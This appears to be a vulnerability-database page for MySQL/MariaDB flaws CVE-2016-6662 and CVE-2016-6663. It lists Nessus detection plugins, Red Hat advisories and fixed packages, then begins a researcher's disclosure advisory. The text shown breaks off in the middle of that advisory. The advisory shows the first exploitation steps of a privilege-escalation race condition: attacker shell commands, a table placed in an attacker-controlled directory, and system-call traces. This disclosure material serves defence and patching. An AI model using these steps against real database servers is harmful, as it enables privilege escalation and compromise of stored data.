  • NASL familyScientific Linux Local Security Checks
    NASL idSL_20170124_MYSQL_ON_SL6_X.NASL
    descriptionSecurity Fix(es) : - It was discovered that the MySQL logging functionality allowed writing to MySQL configuration files. An administrative database user, or a database user with FILE privileges, could possibly use this flaw to run arbitrary commands with root privileges on the system running the database server. (CVE-2016-6662) - A race condition was found in the way MySQL performed MyISAM engine table repair. A database user with shell access to the server running mysqld could use this flaw to change permissions of arbitrary files writable by the mysql system user. (CVE-2016-6663, CVE-2016-5616)
    last seen2020-03-18
    modified2017-01-25
    plugin id96758
    published2017-01-25
    reporterThis script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/96758
    titleScientific Linux Security Update : mysql on SL6.x i386/x86_64 (20170124)
  • NASL familySuSE Local Security Checks
    NASL idSUSE_SU-2016-2780-1.NASL
    descriptionThis mysql version update to 5.5.53 fixes the following issues : - CVE-2016-6662: Unspecified vulnerability in subcomponent Logging (bsc#1005580) - CVE-2016-7440: Unspecified vulnerability in subcomponent Encryption (bsc#1005581) - CVE-2016-5584: Unspecified vulnerability in subcomponent Encryption (bsc#1005558) Release Notes: http://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5- 53.html Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id94757
    published2016-11-14
    reporterThis script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/94757
    titleSUSE SLES11 Security Update : mysql (SUSE-SU-2016:2780-1)
  • NASL familyDatabases
    NASL idMYSQL_5_6_34_RPM.NASL
    descriptionThe version of MySQL running on the remote host is 5.6.x prior to 5.6.34. It is, therefore, affected by multiple vulnerabilities : - Multiple integer overflow conditions exist in s3_srvr.c, ssl_sess.c, and t1_lib.c due to improper use of pointer arithmetic for heap-buffer boundary checks. An unauthenticated, remote attacker can exploit this to cause a denial of service. (CVE-2016-2177) - An information disclosure vulnerability exists in the dsa_sign_setup() function in dsa_ossl.c due to a failure to properly ensure the use of constant-time operations. An unauthenticated, remote attacker can exploit this, via a timing side-channel attack, to disclose DSA key information. (CVE-2016-2178) - A denial of service vulnerability exists in the DTLS implementation due to a failure to properly restrict the lifetime of queue entries associated with unused out-of-order messages. An unauthenticated, remote attacker can exploit this, by maintaining multiple crafted DTLS sessions simultaneously, to exhaust memory. (CVE-2016-2179) - An out-of-bounds read error exists in the X.509 Public Key Infrastructure Time-Stamp Protocol (TSP) implementation. An unauthenticated, remote attacker can exploit this, via a crafted time-stamp file that is mishandled by the
    last seen2020-06-04
    modified2016-10-21
    plugin id94197
    published2016-10-21
    reporterThis script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/94197
    titleMySQL 5.6.x < 5.6.34 Multiple Vulnerabilities (October 2016 CPU) (SWEET32)
  • NASL familySuSE Local Security Checks
    NASL idSUSE_SU-2016-2395-1.NASL
    descriptionThis update for mariadb to 1.0.0.27 fixes the following issues: Security issue fixed : - CVE-2016-6662: A malicious user with SQL and filesystem access could create a my.cnf in the datadir and , under certain circumstances, execute arbitrary code as mysql (or even root) user. (bsc#998309) - release notes : - https://kb.askmonty.org/en/mariadb-10027-release-notes - changelog : - https://kb.askmonty.org/en/mariadb-10027-changelog Bugs fixed : - Make ORDER BY optimization functions take into account multiple equalities. (bsc#949520) Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id93766
    published2016-09-28
    reporterThis script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/93766
    titleSUSE SLES12 Security Update : mariadb (SUSE-SU-2016:2395-1)
  • NASL familyVirtuozzo Local Security Checks
    NASL idVIRTUOZZO_VZLSA-2017-0184.NASL
    descriptionAn update for mysql is now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. MySQL is a multi-user, multi-threaded SQL database server. It consists of the MySQL server daemon (mysqld) and many client programs and libraries. Security Fix(es) : * It was discovered that the MySQL logging functionality allowed writing to MySQL configuration files. An administrative database user, or a database user with FILE privileges, could possibly use this flaw to run arbitrary commands with root privileges on the system running the database server. (CVE-2016-6662) * A race condition was found in the way MySQL performed MyISAM engine table repair. A database user with shell access to the server running mysqld could use this flaw to change permissions of arbitrary files writable by the mysql system user. (CVE-2016-6663, CVE-2016-5616) Note that Tenable Network Security has attempted to extract the preceding description block directly from the corresponding Red Hat security advisory. Virtuozzo provides no description for VZLSA advisories. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id101415
    published2017-07-13
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/101415
    titleVirtuozzo 6 : mysql / mysql-bench / mysql-devel / mysql-embedded / etc (VZLSA-2017-0184)
  • NASL familyCentOS Local Security Checks
    NASL idCENTOS_RHSA-2017-0184.NASL
    descriptionAn update for mysql is now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. MySQL is a multi-user, multi-threaded SQL database server. It consists of the MySQL server daemon (mysqld) and many client programs and libraries. Security Fix(es) : * It was discovered that the MySQL logging functionality allowed writing to MySQL configuration files. An administrative database user, or a database user with FILE privileges, could possibly use this flaw to run arbitrary commands with root privileges on the system running the database server. (CVE-2016-6662) * A race condition was found in the way MySQL performed MyISAM engine table repair. A database user with shell access to the server running mysqld could use this flaw to change permissions of arbitrary files writable by the mysql system user. (CVE-2016-6663, CVE-2016-5616)
    last seen2020-06-01
    modified2020-06-02
    plugin id96812
    published2017-01-27
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/96812
    titleCentOS 6 : mysql (CESA-2017:0184)
  • NASL familyDatabases
    NASL idMYSQL_5_7_16.NASL
    descriptionThe version of MySQL running on the remote host is 5.7.x prior to 5.7.16. It is, therefore, affected by multiple vulnerabilities : - Multiple integer overflow conditions exist in s3_srvr.c, ssl_sess.c, and t1_lib.c due to improper use of pointer arithmetic for heap-buffer boundary checks. An unauthenticated, remote attacker can exploit this to cause a denial of service. (CVE-2016-2177) - An information disclosure vulnerability exists in the dsa_sign_setup() function in dsa_ossl.c due to a failure to properly ensure the use of constant-time operations. An unauthenticated, remote attacker can exploit this, via a timing side-channel attack, to disclose DSA key information. (CVE-2016-2178) - A denial of service vulnerability exists in the DTLS implementation due to a failure to properly restrict the lifetime of queue entries associated with unused out-of-order messages. An unauthenticated, remote attacker can exploit this, by maintaining multiple crafted DTLS sessions simultaneously, to exhaust memory. (CVE-2016-2179) - An out-of-bounds read error exists in the X.509 Public Key Infrastructure Time-Stamp Protocol (TSP) implementation. An unauthenticated, remote attacker can exploit this, via a crafted time-stamp file that is mishandled by the
    last seen2020-06-01
    modified2020-06-02
    plugin id94167
    published2016-10-20
    reporterThis script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/94167
    titleMySQL 5.7.x < 5.7.16 Multiple Vulnerabilities (October 2016 CPU) (SWEET32)
  • NASL familyOracle Linux Local Security Checks
    NASL idORACLELINUX_ELSA-2017-0184.NASL
    descriptionFrom Red Hat Security Advisory 2017:0184 : An update for mysql is now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. MySQL is a multi-user, multi-threaded SQL database server. It consists of the MySQL server daemon (mysqld) and many client programs and libraries. Security Fix(es) : * It was discovered that the MySQL logging functionality allowed writing to MySQL configuration files. An administrative database user, or a database user with FILE privileges, could possibly use this flaw to run arbitrary commands with root privileges on the system running the database server. (CVE-2016-6662) * A race condition was found in the way MySQL performed MyISAM engine table repair. A database user with shell access to the server running mysqld could use this flaw to change permissions of arbitrary files writable by the mysql system user. (CVE-2016-6663, CVE-2016-5616)
    last seen2020-06-01
    modified2020-06-02
    plugin id96753
    published2017-01-25
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/96753
    titleOracle Linux 6 : mysql (ELSA-2017-0184)
  • NASL familySuSE Local Security Checks
    NASL idOPENSUSE-2016-1283.NASL
    descriptionmysql-community-server was updated to 5.6.34 to fix the following issues : - Changes http://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6- 34.html http://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6- 33.html http://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6- 32.html http://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6- 31.html - fixed CVEs: CVE-2016-6304, CVE-2016-6662, CVE-2016-7440, CVE-2016-5584, CVE-2016-5617, CVE-2016-5616, CVE-2016-5626, CVE-2016-3492, CVE-2016-5629, CVE-2016-5507, CVE-2016-8283, CVE-2016-5609, CVE-2016-5612, CVE-2016-5627, CVE-2016-5630, CVE-2016-8284, CVE-2016-8288, CVE-2016-3477, CVE-2016-2105, CVE-2016-3486, CVE-2016-3501, CVE-2016-3521, CVE-2016-3615, CVE-2016-3614, CVE-2016-3459, CVE-2016-5439, CVE-2016-5440 - fixes SUSE Bugs: [boo#999666], [boo#998309], [boo#1005581], [boo#1005558], [boo#1005563], [boo#1005562], [boo#1005566], [boo#1005555], [boo#1005569], [boo#1005557], [boo#1005582], [boo#1005560], [boo#1005561], [boo#1005567], [boo#1005570], [boo#1005583], [boo#1005586], [boo#989913], [boo#977614], [boo#989914], [boo#989915], [boo#989919], [boo#989922], [boo#989921], [boo#989911], [boo#989925], [boo#989926] - append
    last seen2020-06-05
    modified2016-11-11
    plugin id94694
    published2016-11-11
    reporterThis script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/94694
    titleopenSUSE Security Update : mysql-community-server (openSUSE-2016-1283)
  • NASL familyHuawei Local Security Checks
    NASL idEULEROS_SA-2019-1553.NASL
    descriptionAccording to the versions of the mariadb packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities : - Unspecified vulnerability in Oracle MySQL 5.5.49 and earlier, 5.6.30 and earlier, and 5.7.12 and earlier and MariaDB before 5.5.50, 10.0.x before 10.0.26, and 10.1.x before 10.1.15 allows local users to affect confidentiality, integrity, and availability via vectors related to Server: Parser.(CVE-2016-3477) - Unspecified vulnerability in Oracle MySQL 5.5.51 and earlier, 5.6.32 and earlier, and 5.7.14 and earlier allows remote authenticated users to affect availability via vectors related to Server: Optimizer.(CVE-2016-3492) - Unspecified vulnerability in Oracle MySQL 5.5.51 and earlier, 5.6.32 and earlier, and 5.7.14 and earlier allows remote administrators to affect availability via vectors related to Server: Federated.(CVE-2016-5629) - Unspecified vulnerability in Oracle MySQL 5.5.47 and earlier, 5.6.28 and earlier, and 5.7.10 and earlier and MariaDB before 5.5.48, 10.0.x before 10.0.24, and 10.1.x before 10.1.12 allows local users to affect availability via vectors related to Replication.(CVE-2016-0650) - Unspecified vulnerability in Oracle MySQL 5.5.49 and earlier, 5.6.30 and earlier, and 5.7.12 and earlier and MariaDB before 5.5.50, 10.0.x before 10.0.26, and 10.1.x before 10.1.15 allows remote administrators to affect availability via vectors related to Server: RBR.(CVE-2016-5440) - Unspecified vulnerability in Oracle MySQL 5.5.49 and earlier, 5.6.30 and earlier, and 5.7.12 and earlier and MariaDB before 5.5.50, 10.0.x before 10.0.26, and 10.1.x before 10.1.15 allows remote authenticated users to affect availability via vectors related to Server: Types.(CVE-2016-3521) - Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Client. NOTE: the previous information is from the January 2016 CPU. Oracle has not commented on third-party claims that these are multiple buffer overflows in the mysqlshow tool that allow remote database servers to have unspecified impact via a long table or database name.(CVE-2016-0546) - Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect availability via vectors related to DML.(CVE-2016-0598) - Unspecified vulnerability in Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.11 and earlier and MariaDB before 5.5.49, 10.0.x before 10.0.25, and 10.1.x before 10.1.14 allows remote attackers to affect confidentiality via vectors related to Server: Connection.(CVE-2016-5444) - Unspecified vulnerability in Oracle MySQL 5.5.49 and earlier, 5.6.30 and earlier, and 5.7.12 and earlier and MariaDB before 5.5.50, 10.0.x before 10.0.26, and 10.1.x before 10.1.15 allows remote authenticated users to affect availability via vectors related to Server: DML.(CVE-2016-3615) - A race condition was found in the way MySQL performed MyISAM engine table repair. A database user with shell access to the server running mysqld could use this flaw to change permissions of arbitrary files writable by the mysql system user.(CVE-2016-6663) - It was discovered that the MySQL logging functionality allowed writing to MySQL configuration files. An administrative database user, or a database user with FILE privileges, could possibly use this flaw to run arbitrary commands with root privileges on the system running the database server.(CVE-2016-6662) - Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect availability via unknown vectors related to Options.(CVE-2016-0505) - Unspecified vulnerability in Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.11 and earlier and MariaDB before 5.5.49, 10.0.x before 10.0.25, and 10.1.x before 10.1.14 allows local users to affect availability via vectors related to Security: Privileges.(CVE-2016-0666) - Unspecified vulnerability in Oracle MySQL Server 5.5.39 and earlier and 5.6.20 and earlier allows remote authenticated users to affect availability via vectors related to SERVER:OPTIMIZER.(CVE-2014-6469) - Unspecified vulnerability in Oracle MySQL 5.5.47 and earlier, 5.6.28 and earlier, and 5.7.10 and earlier and MariaDB before 5.5.48, 10.0.x before 10.0.24, and 10.1.x before 10.1.12 allows local users to affect integrity and availability via vectors related to DML.(CVE-2016-0640) - Unspecified vulnerability in Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.10 and earlier and MariaDB before 5.5.49, 10.0.x before 10.0.25, and 10.1.x before 10.1.14 allows remote attackers to affect confidentiality via vectors related to Server: Security: Encryption.(CVE-2016-3452) - Unspecified vulnerability in Oracle MySQL 5.5.47 and earlier, 5.6.28 and earlier, and 5.7.10 and earlier and MariaDB before 5.5.48, 10.0.x before 10.0.24, and 10.1.x before 10.1.12 allows local users to affect confidentiality and availability via vectors related to MyISAM.(CVE-2016-0641) - Unspecified vulnerability in Oracle MySQL Server 5.5.39 and earlier and 5.6.20 and earlier allows remote authenticated users to affect availability via vectors related to SERVER:INNODB DML FOREIGN KEYS.(CVE-2014-6464) - Unspecified vulnerability in Oracle MySQL Server 5.5.39 and earlier, and 5.6.20 and earlier, allows remote attackers to affect confidentiality via vectors related to C API SSL CERTIFICATE HANDLING.(CVE-2014-6559) Note that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id125006
    published2019-05-14
    reporterThis script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/125006
    titleEulerOS Virtualization 3.0.1.0 : mariadb (EulerOS-SA-2019-1553)
  • NASL familyDatabases
    NASL idMYSQL_5_6_34.NASL
    descriptionThe version of MySQL running on the remote host is 5.6.x prior to 5.6.34. It is, therefore, affected by multiple vulnerabilities : - Multiple integer overflow conditions exist in s3_srvr.c, ssl_sess.c, and t1_lib.c due to improper use of pointer arithmetic for heap-buffer boundary checks. An unauthenticated, remote attacker can exploit this to cause a denial of service. (CVE-2016-2177) - An information disclosure vulnerability exists in the dsa_sign_setup() function in dsa_ossl.c due to a failure to properly ensure the use of constant-time operations. An unauthenticated, remote attacker can exploit this, via a timing side-channel attack, to disclose DSA key information. (CVE-2016-2178) - A denial of service vulnerability exists in the DTLS implementation due to a failure to properly restrict the lifetime of queue entries associated with unused out-of-order messages. An unauthenticated, remote attacker can exploit this, by maintaining multiple crafted DTLS sessions simultaneously, to exhaust memory. (CVE-2016-2179) - An out-of-bounds read error exists in the X.509 Public Key Infrastructure Time-Stamp Protocol (TSP) implementation. An unauthenticated, remote attacker can exploit this, via a crafted time-stamp file that is mishandled by the
    last seen2020-06-01
    modified2020-06-02
    plugin id94166
    published2016-10-20
    reporterThis script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/94166
    titleMySQL 5.6.x < 5.6.34 Multiple Vulnerabilities (October 2016 CPU) (SWEET32)

Packetstorm

Redhat

advisories
  • rhsa
    idRHSA-2016:2058
  • rhsa
    idRHSA-2016:2059
  • rhsa
    idRHSA-2016:2060
  • rhsa
    idRHSA-2016:2061
  • rhsa
    idRHSA-2016:2062
  • rhsa
    idRHSA-2016:2077
  • rhsa
    idRHSA-2016:2130
  • rhsa
    idRHSA-2016:2131
  • rhsa
    idRHSA-2016:2595
  • rhsa
    idRHSA-2016:2749
  • rhsa
    idRHSA-2016:2927
  • rhsa
    idRHSA-2016:2928
  • rhsa
    idRHSA-2017:0184
rpms
  • mariadb-galera-common-0:5.5.42-1.1.el6ost
  • mariadb-galera-debuginfo-0:5.5.42-1.1.el6ost
  • mariadb-galera-server-0:5.5.42-1.1.el6ost
  • mariadb-galera-common-1:5.5.42-1.2.el7ost
  • mariadb-galera-debuginfo-1:5.5.42-1.2.el7ost
  • mariadb-galera-server-1:5.5.42-1.2.el7ost
  • mariadb-galera-common-1:5.5.42-1.2.el7ost
  • mariadb-galera-debuginfo-1:5.5.42-1.2.el7ost
  • mariadb-galera-server-1:5.5.42-1.2.el7ost
  • mariadb-galera-common-1:5.5.42-5.el7ost
  • mariadb-galera-debuginfo-1:5.5.42-5.el7ost
  • mariadb-galera-server-1:5.5.42-5.el7ost
  • mariadb-galera-common-1:5.5.42-5.el7ost
  • mariadb-galera-debuginfo-1:5.5.42-5.el7ost
  • mariadb-galera-server-1:5.5.42-5.el7ost
  • mariadb-galera-common-1:5.5.42-5.el7ost
  • mariadb-galera-debuginfo-1:5.5.42-5.el7ost
  • mariadb-galera-server-1:5.5.42-5.el7ost
  • mysql55-mysql-0:5.5.52-1.el6
  • mysql55-mysql-0:5.5.52-1.el7
  • mysql55-mysql-bench-0:5.5.52-1.el6
  • mysql55-mysql-bench-0:5.5.52-1.el7
  • mysql55-mysql-debuginfo-0:5.5.52-1.el6
  • mysql55-mysql-debuginfo-0:5.5.52-1.el7
  • mysql55-mysql-devel-0:5.5.52-1.el6
  • mysql55-mysql-devel-0:5.5.52-1.el7
  • mysql55-mysql-libs-0:5.5.52-1.el6
  • mysql55-mysql-libs-0:5.5.52-1.el7
  • mysql55-mysql-server-0:5.5.52-1.el6
  • mysql55-mysql-server-0:5.5.52-1.el7
  • mysql55-mysql-test-0:5.5.52-1.el6
  • mysql55-mysql-test-0:5.5.52-1.el7
  • mariadb55-mariadb-0:5.5.53-1.el6
  • mariadb55-mariadb-0:5.5.53-1.el7
  • mariadb55-mariadb-bench-0:5.5.53-1.el6
  • mariadb55-mariadb-bench-0:5.5.53-1.el7
  • mariadb55-mariadb-debuginfo-0:5.5.53-1.el6
  • mariadb55-mariadb-debuginfo-0:5.5.53-1.el7
  • mariadb55-mariadb-devel-0:5.5.53-1.el6
  • mariadb55-mariadb-devel-0:5.5.53-1.el7
  • mariadb55-mariadb-libs-0:5.5.53-1.el6
  • mariadb55-mariadb-libs-0:5.5.53-1.el7
  • mariadb55-mariadb-server-0:5.5.53-1.el6
  • mariadb55-mariadb-server-0:5.5.53-1.el7
  • mariadb55-mariadb-test-0:5.5.53-1.el6
  • mariadb55-mariadb-test-0:5.5.53-1.el7
  • mariadb-1:5.5.52-1.el7
  • mariadb-bench-1:5.5.52-1.el7
  • mariadb-debuginfo-1:5.5.52-1.el7
  • mariadb-devel-1:5.5.52-1.el7
  • mariadb-embedded-1:5.5.52-1.el7
  • mariadb-embedded-devel-1:5.5.52-1.el7
  • mariadb-libs-1:5.5.52-1.el7
  • mariadb-server-1:5.5.52-1.el7
  • mariadb-test-1:5.5.52-1.el7
  • rh-mysql56-mysql-0:5.6.34-2.el6
  • rh-mysql56-mysql-0:5.6.34-2.el7
  • rh-mysql56-mysql-bench-0:5.6.34-2.el6
  • rh-mysql56-mysql-bench-0:5.6.34-2.el7
  • rh-mysql56-mysql-common-0:5.6.34-2.el6
  • rh-mysql56-mysql-common-0:5.6.34-2.el7
  • rh-mysql56-mysql-config-0:5.6.34-2.el6
  • rh-mysql56-mysql-config-0:5.6.34-2.el7
  • rh-mysql56-mysql-debuginfo-0:5.6.34-2.el6
  • rh-mysql56-mysql-debuginfo-0:5.6.34-2.el7
  • rh-mysql56-mysql-devel-0:5.6.34-2.el6
  • rh-mysql56-mysql-devel-0:5.6.34-2.el7
  • rh-mysql56-mysql-errmsg-0:5.6.34-2.el6
  • rh-mysql56-mysql-errmsg-0:5.6.34-2.el7
  • rh-mysql56-mysql-server-0:5.6.34-2.el6
  • rh-mysql56-mysql-server-0:5.6.34-2.el7
  • rh-mysql56-mysql-test-0:5.6.34-2.el6
  • rh-mysql56-mysql-test-0:5.6.34-2.el7
  • rh-mariadb100-mariadb-1:10.0.28-5.el6
  • rh-mariadb100-mariadb-1:10.0.28-5.el7
  • rh-mariadb100-mariadb-bench-1:10.0.28-5.el6
  • rh-mariadb100-mariadb-bench-1:10.0.28-5.el7
  • rh-mariadb100-mariadb-common-1:10.0.28-5.el6
  • rh-mariadb100-mariadb-common-1:10.0.28-5.el7
  • rh-mariadb100-mariadb-config-1:10.0.28-5.el6
  • rh-mariadb100-mariadb-config-1:10.0.28-5.el7
  • rh-mariadb100-mariadb-debuginfo-1:10.0.28-5.el6
  • rh-mariadb100-mariadb-debuginfo-1:10.0.28-5.el7
  • rh-mariadb100-mariadb-devel-1:10.0.28-5.el6
  • rh-mariadb100-mariadb-devel-1:10.0.28-5.el7
  • rh-mariadb100-mariadb-errmsg-1:10.0.28-5.el6
  • rh-mariadb100-mariadb-errmsg-1:10.0.28-5.el7
  • rh-mariadb100-mariadb-oqgraph-engine-1:10.0.28-5.el6
  • rh-mariadb100-mariadb-oqgraph-engine-1:10.0.28-5.el7
  • rh-mariadb100-mariadb-server-1:10.0.28-5.el6
  • rh-mariadb100-mariadb-server-1:10.0.28-5.el7
  • rh-mariadb100-mariadb-test-1:10.0.28-5.el6
  • rh-mariadb100-mariadb-test-1:10.0.28-5.el7
  • rh-mariadb101-mariadb-1:10.1.19-6.el6
  • rh-mariadb101-mariadb-1:10.1.19-6.el7
  • rh-mariadb101-mariadb-bench-1:10.1.19-6.el6
  • rh-mariadb101-mariadb-bench-1:10.1.19-6.el7
  • rh-mariadb101-mariadb-common-1:10.1.19-6.el6
  • rh-mariadb101-mariadb-common-1:10.1.19-6.el7
  • rh-mariadb101-mariadb-config-1:10.1.19-6.el6
  • rh-mariadb101-mariadb-config-1:10.1.19-6.el7
  • rh-mariadb101-mariadb-debuginfo-1:10.1.19-6.el6
  • rh-mariadb101-mariadb-debuginfo-1:10.1.19-6.el7
  • rh-mariadb101-mariadb-devel-1:10.1.19-6.el6
  • rh-mariadb101-mariadb-devel-1:10.1.19-6.el7
  • rh-mariadb101-mariadb-errmsg-1:10.1.19-6.el6
  • rh-mariadb101-mariadb-errmsg-1:10.1.19-6.el7
  • rh-mariadb101-mariadb-oqgraph-engine-1:10.1.19-6.el6
  • rh-mariadb101-mariadb-oqgraph-engine-1:10.1.19-6.el7
  • rh-mariadb101-mariadb-server-1:10.1.19-6.el6
  • rh-mariadb101-mariadb-server-1:10.1.19-6.el7
  • rh-mariadb101-mariadb-server-galera-1:10.1.19-6.el6
  • rh-mariadb101-mariadb-server-galera-1:10.1.19-6.el7
  • rh-mariadb101-mariadb-test-1:10.1.19-6.el6
  • rh-mariadb101-mariadb-test-1:10.1.19-6.el7
  • mysql-0:5.1.73-8.el6_8
  • mysql-bench-0:5.1.73-8.el6_8
  • mysql-debuginfo-0:5.1.73-8.el6_8
  • mysql-devel-0:5.1.73-8.el6_8
  • mysql-embedded-0:5.1.73-8.el6_8
  • mysql-embedded-devel-0:5.1.73-8.el6_8
  • mysql-libs-0:5.1.73-8.el6_8
  • mysql-server-0:5.1.73-8.el6_8
  • mysql-test-0:5.1.73-8.el6_8

Seebug

  • bulletinFamilyexploit
    description- Release date: 01.11.2016 - Discovered by: Dawid Golunski I. VULNERABILITY ------------------------- MySQL / MariaDB / PerconaDB - Privilege Escalation / Race Condition MariaDB < 5.5.52 < 10.1.18 < 10.0.28 MySQL <= 5.5.51 <= 5.6.32 <= 5.7.14 Percona Server < 5.5.51-38.2 < 5.6.32-78-1 < 5.7.14-8 Percona XtraDB Cluster < 5.6.32-25.17 < 5.7.14-26.17 < 5.5.41-37.0 II. BACKGROUND ------------------------- MySQL: "MySQL is the world's most popular open source database. Whether you are a fast growing web property, technology ISV or large enterprise, MySQL can cost-effectively help you deliver high performance, scalable database applications." "Many of the world's largest and fastest-growing organizations including Facebook, Google, Adobe, Alcatel Lucent and Zappos rely on MySQL to save time and money powering their high-volume Web sites, business-critical systems and packaged software." http://www.mysql.com/products/ http://www.mysql.com/why-mysql/ -- MariaDB: "MariaDB is one of the most popular database servers in the world. It’s made by the original developers of MySQL and guaranteed to stay open source. Notable users include Wikipedia, WordPress.com and Google. MariaDB turns data into structured information in a wide array of applications, ranging from banking to websites. It is an enhanced, drop-in replacement for MySQL. MariaDB is used because it is fast, scalable and robust, with a rich ecosystem of storage engines, plugins and many other tools make it very versatile for a wide variety of use cases." https://mariadb.org/about/ -- PerconaDB: "Percona Server for MySQL® is a free, fully compatible, enhanced, open source drop-in replacement for MySQL that provides superior performance, scalability and instrumentation. With over 3,000,000 downloads, Percona Server’s self-tuning algorithms and support for extremely high-performance hardware delivers excellent performance and reliability." https://www.percona.com/software/mysql-database/percona-server III. INTRODUCTION ------------------------- An independent research has revealed a race condition vulnerability which is present in MySQl, MariaDB and PerconaDB databases. The vulnerability can allow a local system user with access to the affected database in the context of a low-privileged account (CREATE/INSERT/SELECT grants) to escalate their privileges and execute arbitrary code as the database system user (typically 'mysql'). Successful exploitation would allow an attacker to gain access to all of the databases stored on the affected database server. The obtained level of access upon the exploitation, could be chained with the other privilege escalation vulnerabilities discovered by the author of this advisory (CVE-2016-6662 and CVE-2016-6664) to further escalate privileges from mysql user to root user and thus allow attackers to fully compromise the target server. IV. DESCRIPTION ------------------------- Table locations ~~~~~~~~~~~~~~~~~~ MySQL-based databases allow users with CREATE table privilege to optionally specify a disk path of the directory where the table will be stored via a DATA DIRECTORY parameter in the CREATE statement. Users who have access to a database account with CREATE grant could create a table under a directory that they can control. For example: attacker@debian:~$ mkdir /tmp/disktable attacker@debian:~$ chmod 777 /tmp/disktable/ attacker@debian:~$ ls -ld /tmp/disktable/ drwxrwxrwx 2 attacker attacker 4096 Oct 28 10:53 /tmp/disktable/ A user could then place a table within the directory with the following SQL statement: mysql> CREATE TABLE poctab1 (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/disktable'; which would result in creating the following table file: attacker@debian:~$ ls -l /tmp/disktable/ total 0 -rw-rw---- 1 mysql mysql 0 Oct 28 10:53 poctab1.MYD Race Condition ~~~~~~~~~~~~~~~~~~ Observing file operations performed on the table stored within the directory, it was discovered that REPAIR TABLE SQL statement which is available to low-privileged users with SELECT/CREATE/INSERT grants, performed unsafe operations on temporary files created during the table repair process. Executing the statement: ``` mysql> REPAIR TABLE `poctab1`; +----------------+--------+----------+----------+ | Table | Op | Msg_type | Msg_text | +----------------+--------+----------+----------+ | testdb.poctab1 | repair | status | OK | +----------------+--------+----------+----------+ would result in execution of the following system calls: [pid 1463] lstat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0 [pid 1463] open("/tmp/disktable/poctab1.MYD", O_RDWR) = 65 [pid 1463] access("./testdb/poctab1.TRG", F_OK) = -1 ENOENT (No such file or directory) [pid 1463] lseek(65, 0, SEEK_CUR) = 0 [pid 1463] lseek(65, 0, SEEK_END) = 0 [pid 1463] mprotect(0x7f6a3804f000, 12288, PROT_READ|PROT_WRITE) = 0 [pid 1463] open("/tmp/disktable/poctab1.TMD", O_RDWR|O_CREAT|O_EXCL|O_TRUNC, 0660) = 66 [pid 1463] lseek(65, 0, SEEK_END) = 0 [pid 1463] lseek(64, 0, SEEK_END) = 1024 [pid 1463] close(65) = 0 [pid 1463] close(66) = 0 [pid 1463] lstat("/tmp", {st_mode=S_IFDIR|S_ISVTX|0777, st_size=4096, ...}) = 0 [pid 1463] lstat("/tmp/disktable", {st_mode=S_IFDIR|0777, st_size=4096, ...}) = 0 [pid 1463] lstat("/tmp/disktable/poctab1.MYD", 